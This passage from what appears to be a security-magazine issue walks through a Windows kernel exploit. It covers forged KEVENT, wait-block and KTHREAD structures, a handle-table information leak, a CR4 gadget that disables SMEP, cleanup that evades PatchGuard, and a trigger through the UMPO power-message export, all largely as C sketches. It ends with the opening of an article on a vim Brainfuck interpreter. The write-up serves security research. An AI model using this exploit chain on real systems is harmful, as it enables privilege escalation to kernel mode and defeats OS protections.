  Note that in Windows 10, steps 13 to 16 are only performed if the new thread is not a system thread, which is indicated by the SystemThread flag in the KTHREAD.

  Finally, back in KiSwapContext, the RESTORE_EXCEPTION_FRAME macro is used to pop all non-volatile register state off the stack frame.

  Coda

  With the sequence of steps performed by the context switch now exposed, taking control of a thread becomes a simple matter of controlling its KernelStack field in the KTHREAD. As soon as RSP is set to this location, the eventual ret instruction (that most ROP-friendly of instructions) will take us wherever we need to go, with full Ring 0 privileges.

  Better yet, if we return into KiSwapContext (assuming we have an information leak for its address), the RESTORE_EXCEPTION_FRAME macro will take care of everything but RAX, RCX, and RDX for us. We can, of course, return anywhere else we’d like and build our own ROP chain.

  PoC

  Let’s look at the code that implements everything we’ve just seen. First, we need to hard-code our current user-mode thread to run only on the first CPU of Group 0 (always CPU 0). The reason for this will become obvious shortly:
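
  Here is a minimal user-mode sketch of that pinning step, using the documented group-affinity API (the variable names are ours):

  #include <windows.h>

  GROUP_AFFINITY affinity = { 0 };
  affinity.Group = 0;                                 /* processor group 0 */
  affinity.Mask  = 1;                                 /* CPU 0 only        */
  SetThreadGroupAffinity(GetCurrentThread(), &affinity, NULL);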

  Next, let us create an active, wait-any wait block, associated with an arbitrary thread:
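
  This is a sketch only: the structure below is a user-mode mirror of KWAIT_BLOCK whose field names come from the public symbols, and the numeric WaitAny/WaitBlockActive values are assumptions to verify against the target build. Here, deathThread stands for the forged user-mode KTHREAD mirror that the next steps fill out.

  typedef struct _FAKE_KWAIT_BLOCK {
      LIST_ENTRY WaitListEntry;
      UCHAR      WaitType;                  /* WaitAny                        */
      UCHAR      BlockState;                /* WaitBlockActive                */
      USHORT     WaitKey;
      LONG       SpareLong;
      PVOID      Thread;                    /* owning (forged) KTHREAD        */
      PVOID      Object;                    /* dispatcher object being waited */
      PVOID      SparePtr;
  } FAKE_KWAIT_BLOCK;

  FAKE_KWAIT_BLOCK deathBlock = { 0 };
  deathBlock.WaitType   = 1;                /* WaitAny (assumed value)        */
  deathBlock.BlockState = 4;                /* WaitBlockActive (assumed)      */
  deathBlock.Thread     = &deathThread;     /* our forged KTHREAD, see below  */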

  Then we create a Synchronization Event, which is currently tied to this wait block:
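
  A sketch of the forged event itself, again with a user-mode mirror of the dispatcher header (field names from the public symbols; the synchronization-event type value is an assumption):

  typedef struct _FAKE_KEVENT {
      UCHAR      Type;                      /* EventSynchronizationObject     */
      UCHAR      Reserved[3];
      LONG       SignalState;
      LIST_ENTRY WaitListHead;
  } FAKE_KEVENT;

  FAKE_KEVENT deathEvent = { 0 };
  deathEvent.Type        = 1;               /* SynchronizationEvent (assumed) */
  deathEvent.SignalState = 0;               /* not signaled: wait outstanding */

  /* Link the event and the wait block to each other, both ways. */
  deathEvent.WaitListHead.Flink  = &deathBlock.WaitListEntry;
  deathEvent.WaitListHead.Blink  = &deathBlock.WaitListEntry;
  deathBlock.WaitListEntry.Flink = &deathEvent.WaitListHead;
  deathBlock.WaitListEntry.Blink = &deathEvent.WaitListHead;
  deathBlock.Object              = &deathEvent;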

  All right! We now have our event and wait block. It’s tied to the deathThread, so let’s go fill that out. First, we give this thread the correct hard affinity (i.e., the one we just set for ourselves) and soft affinity (i.e., the ideal processor). Note that the ideal processor is expressed as the raw processor index, which is not available to user mode. Therefore, by having forced our thread to run on Group 0 earlier, we can guarantee that CPU index 0 matches Processor 0.
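
  In code, that might look like the sketch below, where deathThread is a zero-initialized user-mode mirror of the target build’s KTHREAD (for instance, generated from the public symbols), the same variable used in the listings that follow; the affinity field layout is an assumption.

  deathThread.Affinity.Count     = 1;       /* one active group               */
  deathThread.Affinity.Bitmap[0] = 1;       /* hard affinity: CPU 0, group 0  */
  deathThread.IdealProcessor     = 0;       /* soft affinity: raw index 0     */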

  Now we know this thread will run on the same processor we’re on, but we want to guarantee it will pre-empt us. In other words, we need to bump up its priority higher than ours. We could pick any number higher than the current priority, but we’ll pick 31 for two reasons. First, it’s practically guaranteed to pre-empt anything on this processor, and second, it’s in the so-called real-time range, which means it’s not subject to priority adjustments and quantum tracking; this will make the scheduler’s job easier when getting this thread into a runnable state (and avoid us having to define more state).

  deathThread.Priority = 31;

  Okay, so if we’re going to claim that our event object is being waited on by this thread, we better make the thread appear as if it’s in a committed waiting state with one wait block—the one with which the event is associated.
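
  A heavily hedged sketch of that state follows; the field names track the public KTHREAD symbols, and every numeric value here is an assumption to check against the target build.

  deathThread.State              = 5;            /* Waiting                    */
  deathThread.WaitRegister.State = 1;            /* WaitCommitted              */
  deathThread.WaitBlockList      = &deathBlock;  /* exactly one wait block     */
  deathThread.WaitIrql           = 0;            /* wait entered at PASSIVE    */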

  Excellent! For the context switch routine to work correctly, we also need to make it look like this thread is in the same process as the current thread. Otherwise, our address space will become invalid, and all sorts of other crashes will occur. In order to do this, we need the kernel pointer of the current process, or KPROCESS structure. Thankfully, there exists a variety of documented information leaks in the kernel that will allow us to obtain this information. One common technique is to open a handle to our own process and then enumerate the system handle table until we find the entry matching our process ID and handle value; that entry contains the kernel address of the object associated with the handle (i.e., our very own process!).
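
  One way to implement that leak, sketched below, is the familiar NtQuerySystemInformation route with the SystemExtendedHandleInformation class. The structure layouts are the usual community reconstructions of undocumented types, and the information class value is an assumption to double-check.

  #include <winternl.h>
  #include <stdlib.h>
  #define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xC0000004L)

  typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX {
      PVOID     Object;
      ULONG_PTR UniqueProcessId;
      ULONG_PTR HandleValue;
      ULONG     GrantedAccess;
      USHORT    CreatorBackTraceIndex;
      USHORT    ObjectTypeIndex;
      ULONG     HandleAttributes;
      ULONG     Reserved;
  } SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX;

  typedef struct _SYSTEM_HANDLE_INFORMATION_EX {
      ULONG_PTR NumberOfHandles;
      ULONG_PTR Reserved;
      SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX Handles[1];
  } SYSTEM_HANDLE_INFORMATION_EX, *PSYSTEM_HANDLE_INFORMATION_EX;

  PVOID LeakCurrentProcessObject(VOID)
  {
      HANDLE self = OpenProcess(PROCESS_QUERY_LIMITED_INFORMATION,
                                FALSE, GetCurrentProcessId());
      ULONG size = 0x100000, returned;
      PSYSTEM_HANDLE_INFORMATION_EX info;
      PVOID object = NULL;
      ULONG_PTR i;

      /* Grab a snapshot of every handle on the system, growing the
         buffer until it fits. */
      for (;;) {
          info = (PSYSTEM_HANDLE_INFORMATION_EX)malloc(size);
          if (NtQuerySystemInformation((SYSTEM_INFORMATION_CLASS)0x40,
                                       info, size, &returned)
              != STATUS_INFO_LENGTH_MISMATCH) {
              break;
          }
          free(info);
          size *= 2;
      }

      /* Our PID plus our handle value identifies the entry whose Object
         field is the kernel address of our own process object. */
      for (i = 0; i < info->NumberOfHandles; i++) {
          if ((info->Handles[i].UniqueProcessId == GetCurrentProcessId()) &&
              (info->Handles[i].HandleValue == (ULONG_PTR)self)) {
              object = info->Handles[i].Object;
              break;
          }
      }

      free(info);
      CloseHandle(self);
      return object;                /* this becomes addrProcess below */
  }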

  deathThread.ApcState.Process = addrProcess;

  Last, but not least, we need to set up the kernel stack, which should be pointing to a KSWITCH_FRAME. And we need to confirm that the stack truly is resident, as per our discoveries above. The switch frame has a return address, which we are free to set to any address we’d like to ROP into.
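
  A sketch of that setup follows. The x64 KSWITCH_FRAME layout used here (five home slots, ApcBypass, saved RBP, return address) is an assumption from the public symbols, and exploitGadget is whatever address we decide to pivot into (discussed next).

  typedef struct _FAKE_KSWITCH_FRAME {
      ULONG64 P1Home, P2Home, P3Home, P4Home, P5Home;
      UCHAR   ApcBypass;
      UCHAR   Reserved[7];
      ULONG64 Rbp;
      ULONG64 Return;
  } FAKE_KSWITCH_FRAME;

  /* Commit and touch a user-mode buffer that will act as the "kernel"
     stack, so that it is guaranteed to be resident. */
  PUCHAR stack = (PUCHAR)VirtualAlloc(NULL, 0x10000,
                                      MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
  ZeroMemory(stack, 0x10000);
  VirtualLock(stack, 0x10000);

  /* Carve the switch frame in the middle, leaving room above it for the
     KEXCEPTION_FRAME/ROP chain we build later. */
  FAKE_KSWITCH_FRAME* frame = (FAKE_KSWITCH_FRAME*)(stack + 0x8000);
  frame->Return = (ULONG64)exploitGadget;
  deathThread.KernelStack = frame;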

  Actually, let’s not forget that we also need to have a valid FPU stack, so that the FPU/XSAVE restore can work when context switching. One easy way to do this is as follows:

  Once all these operations are done, we have a fully exploitable event object, which will get us to “exploitGadget.” But what should that be?

  ACT II. The Right Gadget and Cleanup

  ROPing to User-Mode

  Once we’ve established control over RIP/RSP, it’s time to actually extract some use out of this ability. As we’re not going to be injecting executable code in the kernel,51 the best place to direct RIP is in user mode. Sadly, modern mitigations such as SMEP make this impossible, and any attempt to execute our user-mode code will result in a nasty crash. Fortunately, SMEP is a CPU feature that must be enabled by software, and it relies on a particular flag in CR4 being set. All we need is the right ROP gadget to turn that flag off. As it happens, the function to flush the current TLB is inlined throughout the kernel, which results in the following assembly sequence when it’s done at the end of a function:
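
  On the builds we looked at, the tail of that inlined flush looks roughly like the listing below; the exact register that holds the saved CR4 value varies from build to build, so treat this as an assumption to confirm in a disassembler.

  mov  cr4, rcx    ; write the caller-controlled value back into CR4
  ret              ; ...and return: a perfect SMEP-off gadget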

  Well, now all that we’re missing is a gadget to load the right value into RCX. This isn’t hard, and for example, the KeRemoveQueueDpcEx function, which is exported, has exactly what we need:

  With these two simple gadgets, we can control and fill out the KEXCEPTION_FRAME that’s supposed to be right on top of the KSWITCH_FRAME as follows:

  Consistency and Recovery

  Imagine yourself in Stage1Payload now. Your KPRCB’s CurrentThread field points to a user-mode KTHREAD inside of your own personal address space. Your RSP (and your KTHREAD’s RSP and TSS’s RSP0) also point to some user-mode buffer that’s only valid inside your address space. All it takes is another thread on another processor scouring the CPU queues (trying to figure out who to pre-empt) and dereferencing the death thread, before a crash occurs. And let me tell you, that happens... a lot! Our first order of business should therefore be to allocate some sort of globally visible kernel memory where we can store the KTHREAD we’ve built for ourselves. But the mere act of allocating memory will take a relatively long time, and chances are high we’ll crash early.

  So we’ll take a page out of some very early NT rootkits and exploit the fact that the KUSER_SHARED_DATA structure has a fixed, global address on all Windows machines and is visible in all processes. It’s got just enough slack space to fit our KTHREAD structure, too! As soon as that’s done, we want to update the KPRCB’s CurrentThread to point to this new copy. The code looks something like this:
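
  The sketch below assumes the classic fixed mapping of KUSER_SHARED_DATA at 0xFFFFF78000000000 in kernel mode, a KUSER_SHARED_DATA definition taken from the WDK headers, and the well-known gs:[188h] location of the PRCB’s CurrentThread pointer on x64; PKTHREAD refers to the same user-mode KTHREAD mirror used earlier.

  #define SHARED_USER_DATA 0xFFFFF78000000000ULL   /* fixed kernel-mode mapping */

  PKTHREAD newThread = (PKTHREAD)(SHARED_USER_DATA + sizeof(KUSER_SHARED_DATA));
  memcpy(newThread, &deathThread, sizeof(deathThread));

  /* In kernel mode, GS points at the KPCR; the PRCB lives at +0x180 and
     its CurrentThread pointer at +0x188. */
  __writegsqword(0x188, (ULONG64)newThread);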

  Although unlikely, a race condition is still possible right before the copy completes. One could avoid this by creating a user-mode process that creates priority 31 threads on all processors but the current one, spinning forever, until the exploit completes. That will remove any occurrences of processor queue scanning.
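
  A sketch of such a helper, using only documented Win32 calls (note that REALTIME_PRIORITY_CLASS silently degrades to HIGH_PRIORITY_CLASS without the increase-base-priority privilege):

  static DWORD WINAPI SpinForever(LPVOID p)
  {
      UNREFERENCED_PARAMETER(p);
      for (;;) { /* burn the CPU until the exploit completes */ }
  }

  static VOID PinOtherProcessors(VOID)
  {
      DWORD i, self = GetCurrentProcessorNumber();

      SetPriorityClass(GetCurrentProcess(), REALTIME_PRIORITY_CLASS);
      for (i = 0; i < GetActiveProcessorCount(0); i++) {
          if (i == self) continue;                 /* leave our own CPU alone */
          HANDLE t = CreateThread(NULL, 0, SpinForever, NULL,
                                  CREATE_SUSPENDED, NULL);
          SetThreadAffinityMask(t, 1ULL << i);
          SetThreadPriority(t, THREAD_PRIORITY_TIME_CRITICAL);  /* 31 in RT class */
          ResumeThread(t);
      }
  }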

  At this point, we can now attack the kernel in any way we want, but once we’re done, what happens to this thread? We could attempt to terminate it with PsTerminateSystemThread, but a number of things are likely to go wrong—namely that we aren’t a system thread (but we could fix that by setting the right KTHREAD flag). Even beyond that, however, the API would attempt to access a number of additional KTHREAD and KPROCESS fields, dereference the thread object as an ETHREAD (which we haven’t built), and require an amount of information leaks so great that it is unlikely to ever work. Entering a tight spin loop would fix these problems, but the CPU would be pegged down forever, and a single-core machine would simply lock up.

  We’ve seen, however, that we have enough of a KTHREAD to exit the scheduler and even be context-switched in. Do we have enough to enter the scheduler and be context-switched out? The simplest way to do so is to use the KeDelayExecutionThread API and pass in an absurdly large timeout value—guaranteeing our thread will be stuck in a wait state forever.

  Before doing so, however, we should remember that all dispatching operations happen at DISPATCH_LEVEL, as we saw earlier. Normally, the exit from SwapContext would have returned to some function that had raised the IRQL, so that it could then lower it. We are not allowed to re-enter the scheduler at this IRQL, so we’ll first lower it back down to PASSIVE_LEVEL ourselves. Our final cleanup code thus looks like this:
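
  A sketch of that cleanup; pKeDelayExecutionThread is assumed to have been resolved earlier (for example, from the leaked kernel base), and on x64 the IRQL is simply the value of CR8.

  LARGE_INTEGER forever;
  forever.QuadPart = (LONGLONG)0x8000000000000000ULL;  /* relative timeout: effectively infinite */

  __writecr8(0);                                       /* DISPATCH_LEVEL -> PASSIVE_LEVEL        */
  pKeDelayExecutionThread(0 /* KernelMode */, FALSE, &forever);  /* never returns                */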

  Enter PatchGuard

  Readers of this magazine ought to know that Skape and Skywing aren’t idiots—their PatchGuard technology embedded in the NT kernel actively scans for changes to KUSER_SHARED_DATA. Any modification, such as our addition of a random KTHREAD in its tail, will result in the famous 109 BSOD, with a code of “0” or “Generic Data Modification.”

  Thus, we need to clear out our KTHREAD from there—but that poses a problem since we can’t destroy the KTHREAD before we call KeDelayExecutionThread. One option is to allocate some non-paged pool memory and copy our KTHREAD structure in there, then modify the KPRCB CurrentThread pointer yet again. But this means that we will be leaking a KTHREAD in memory forever. Can we do better?

  Another possibility is to destroy the KTHREAD after KeDelayExecutionThread has executed. Nobody will ever need to look at, or touch, the structure, since we know it will never wake up again. But how can we run after the endless delay? Clearly, we need another activation point, and Windows offers timer-based deferred procedure calls (DPCs) as a solution. By allocating a nonpaged pool buffer containing a KTIMER structure (initialized with KeInitializeTimer) and a KDPC structure (initialized with KeInitializeDpc), we can then use KeSetTimer to force the execution of the DPC, say, five seconds later. This is easy to do:
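
  Sketched below with the documented timer and DPC APIs; the p-prefixed kernel imports are assumed to have been resolved already, the KTIMER/KDPC definitions come from the WDK headers, and the pool tag is arbitrary.

  typedef struct _CLEAN_CTX {
      KTIMER Timer;
      KDPC   Dpc;
  } CLEAN_CTX, *PCLEAN_CTX;

  PCLEAN_CTX ctx = pExAllocatePoolWithTag(0 /* NonPagedPool */, sizeof(*ctx), 'PcoP');

  LARGE_INTEGER due;
  due.QuadPart = -5LL * 10 * 1000 * 1000;        /* five seconds, in 100ns units */

  pKeInitializeTimer(&ctx->Timer);
  pKeInitializeDpc(&ctx->Dpc, CleanDpc, ctx);    /* CleanDpc is shown below      */
  pKeSetTimer(&ctx->Timer, due, &ctx->Dpc);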

  Inside of the CleanDpc routine, we simply destroy the thread and free the data:
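
  A sketch of the first version of that routine (it picks up a couple of extra duties in the next sections):

  VOID CleanDpc(PKDPC Dpc, PVOID Context, PVOID Arg1, PVOID Arg2)
  {
      PCLEAN_CTX ctx = (PCLEAN_CTX)Context;

      /* Wipe the fake KTHREAD parked in KUSER_SHARED_DATA so PatchGuard
         sees the structure in its pristine state again. */
      memset(newThread, 0, sizeof(*newThread));

      /* Free the timer/DPC context itself. */
      pExFreePoolWithTag(ctx, 'PcoP');
  }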

  With the KUSER_SHARED_DATA structure cleaned up, we should never hear from PatchGuard again. And so the system is now restored back to sanity—except for the case when, a few seconds later, some thread on some arbitrary processor inserts a new timer into the timer table. The kernel, after computing one of 256 hash buckets for the KTIMER entry, inserts it into the list of existing KTIMER structures that share the same hash—a list that, with a probability of 1/256, contains the near-infinitely expiring timer that KeDelayExecutionThread is using. Why is this a problem, you ask?

  Well, as it happens, the kernel doesn’t want to have to create a timer object whenever a wait is done that involves a timeout. And so, any time that a synchronization object is waited upon for a fixed period of time, or any time that a Sleep/KeDelayExecutionThread call is performed, an internal KTIMER structure that is preallocated in the KTHREAD structure is used, under the field name Timer. This also creates one of the NT kernel’s best-designed features: the ability to wait on objects without requiring a single memory allocation.

  Unfortunately for us as attackers, this means that the timer table now contains a pointer to what is essentially computable as KUSER_SHARED_DATA + sizeof(KUSER_SHARED_DATA) + FIELD_OFFSET(KTHREAD, Timer)... a data structure that we have completely zeroed out. That list of hash entries will therefore hit a null pointer and crash.52 We must then do one more thing in the CleanDpc routine: remove this linkage. We can do this easily:

  RemoveEntryList(&newThread->Timer.TimerListEntry);

  PatchGuard Redux

  Remember the part about PatchGuard’s developers not being stupid? Well, they’re certainly not going to let the corrupt, SMEP-disabled value of CR4 stand! And so it is that after a few minutes (or less), another 109 BSOD is likely to appear, this time with code 15 (“Critical processor register modified”). Hence, this is one more thing that we’re going to have to clean up, and yet again something that we cannot do in our user-mode payload before the KeDelayExecutionThread call, because the very next instruction we executed would then trigger an SMEP violation. Good thing we’ve got our five-second timer-based DPC!

  Except that things are never that easy, as readers probably know. One of the great (or terrible) things about DPCs is that they run in arbitrary thread context and don’t have a particular affinity to a given processor either, unless told otherwise. While in a normal interrupt service routine environment the DPC will typically execute on the same processor it was queued on, this is not the case with timer-based DPCs. In fact, on most systems these will execute on CPU 0 at all times, whereas on others they can be distributed across processors based on utilization and power needs. Why is this a problem? Because we’ve disabled SMEP on one particular processor (the one that ran our first-stage user-mode payload), while the DPC can run on a completely different processor.

  As always, the NT kernel offers up an API as a solution. By using KeSetTargetProcessorDpcEx, we can make sure the DPC runs on the same processor as our first stage payload (which should be CPU 0, Group 0, but let’s do this in a more portable way):
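
  For example, with the same resolved-import convention as before:

  PROCESSOR_NUMBER self;
  pKeGetCurrentProcessorNumberEx(&self);          /* group + index we are running on */
  pKeSetTargetProcessorDpcEx(&ctx->Dpc, &self);   /* pin CleanDpc to this processor  */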

  Success is now ours! By cleaning up the KUSER_SHARED_DATA structure, eliminating the KTHREAD’s timer from the timer list, and restoring CR4 back to its original value, the system is now fully restored to its original state, and we’ve even freed the KDPC and KTIMER structures. There’s now not a single trace of the thread left around, which pretty much amounts to the initial idea of terminating the thread. From dust we made it, and to dust it returned.

  Of course, our payload hasn’t actually done anything other than clean up after itself. Obviously, at this point, any number of real system threads could be created, periodic timer DPCs could be queued, work items could be queued, and any other arbitrary kernel-mode operation is permitted, depending on the ultimate goals of our exploit.

  ACT III. Denouement

  The Trigger

  We have so far been operating in an imaginary world where we can send the kernel an arbitrary event object as a KEVENT and have the kernel attempt to signal it. We have now shown that this scenario can reliably lead to kernel code execution. The next question is, how can we trigger it?

  As it happens, the kernel has a function called PopUmpoProcessPowerMessage, which responds to any message sent to the ALPC port that it creates, called PowerPort. Such messages have a simple 4-byte header indicating their type; a type of 7, which we’ll call PowerMessageNotifyLegacyEvent, is treated as follows:
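
  In rough pseudocode, reconstructed from the behavior described here rather than from the actual source (the field name is hypothetical), the type-7 path boils down to:

  /* PopUmpoProcessPowerMessage, type 7 (reconstruction): */
  event = (PKEVENT)message->NotifyLegacyEvent;   /* attacker-controlled pointer */
  if (event != NULL) {
      KeSetEvent(event, IO_NO_INCREMENT, FALSE); /* kernel signals our "event"  */
  }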

  To send messages to this port, a complex series of ALPC-specific setup actions, plus somehow getting access to the port itself, would normally be required. Thankfully, we don’t need to do any of that, as the UMPO.DLL library, which implements the User Mode Power Manager, exports a handy UmpoAlpcSendPowerMessage function. By simply injecting a DLL containing all of the code above into the hosting service, we can execute the following sequence to trigger a Ring 3 to Ring 0 jump:
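
  A sketch of that sequence from inside the injected DLL. UmpoAlpcSendPowerMessage is a real export of UMPO.DLL, but the prototype used here is a guess, and the message layout (the 4-byte type followed by the event pointer) is an assumption based on the description above; deathEvent is the forged event from the earlier sketch.

  typedef ULONG (WINAPI *UMPO_SEND_POWER_MESSAGE)(PVOID Buffer, ULONG Length);

  UMPO_SEND_POWER_MESSAGE pUmpoAlpcSendPowerMessage =
      (UMPO_SEND_POWER_MESSAGE)GetProcAddress(GetModuleHandleW(L"umpo.dll"),
                                              "UmpoAlpcSendPowerMessage");

  struct {
      ULONG Type;                       /* 7 = PowerMessageNotifyLegacyEvent     */
      ULONG Pad;
      PVOID Event;                      /* our forged KEVENT (user-mode address) */
  } msg = { 7, 0, &deathEvent };

  pUmpoAlpcSendPowerMessage(&msg, sizeof(msg));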

  Conclusion

  As we’ve seen in this analysis, even the most apparently unexploitable data corruption/type confusion bugs can sometimes be busted open with sufficient understanding of the underlying operating system and of the rules around the particular data. I’m aware of another vulnerability that results in control of a lock object, one which, when fixed, was assumed to be nothing more than a DoS. I posit that such a lock object could’ve also been maliciously constructed to appear in a non-acquired state, which would then cause the kernel to let the thread acquire the lock; meanwhile, with a race condition, the lock could’ve been made to appear contended, so as to cause the release path to signal the contention event, ultimately leading to the same exploitation path as discussed here.

  It is also important to note that such data corruption vulnerabilities, which can lead to stack pivoting and ROP into user mode, will bypass technologies such as Device Guard, even if configured with Hypervisor Code Integrity (HVCI), due to the fact that all of the pages executing here are marked as executable. All that is needed is the ability to redirect execution to the UMPO function, which could be done if UMCI (User Mode Code Integrity) is disabled, or if PowerShell is enabled without script protection: one can then reflectively inject into and redirect execution of the Svchost.exe process. Note, however, that enabling HVCI activates HyperGuard, which protects the CR4 register and prevents turning off SMEP. That must be bypassed with a more complex exploit technique, either by attacking the PTEs or by making the kernel payload itself pure ROP.

  Finally, Windows Redstone build 14352 and later fix this issue, just in time for the publication of this article. The fix will not be back-ported, however, as the bug does not meet the bulletin bar.

  12:9 A VIM Execution Engine

  by Chris Domas
  The power of vim is known far and wide, yet it is only when we push the venerable editor to its limits that we truly see its beauty. To conclusively demonstrate vim’s majesty, and silence heretical doubters, let us construct a copy/paste/search/replace Turing machine, using vanilla vim commands.

  First, we lay some ground rules. Naturally, we could build a Turing machine using the built-in vimscript, but it is already known that vimscript is Turing-complete, and this is hardly sporting. vim ex commands—the requests we make from vim when we type a colon—are abundant and powerful, but these too would make the task simple, and therefore would fail to illustrate the glory of vim. Instead, we strive to limit ourselves to normal vim commands: yank, put, delete, search, and the like.

  With these constraints in mind, we must decide on the design of our machine. For simplicity, let us implement an interpreter for the widely known Brainfuck (BF) programming language. Our machine will be a simple text file that, when opened in vim and started with a few key presses, interprets BF code through copy/paste/search/replace-style vim commands.

  Let us begin by giving our machine some memory. We create data tape in the text file by simply adding the following:

  _t :

  0 0 0 0 0 0 0 0 0 0

  We now have ten data cells, which we can locate by searching for _t.

  Now what of the BF code itself? Let us add a Fibonacci number generator to the file.

  _p :

 
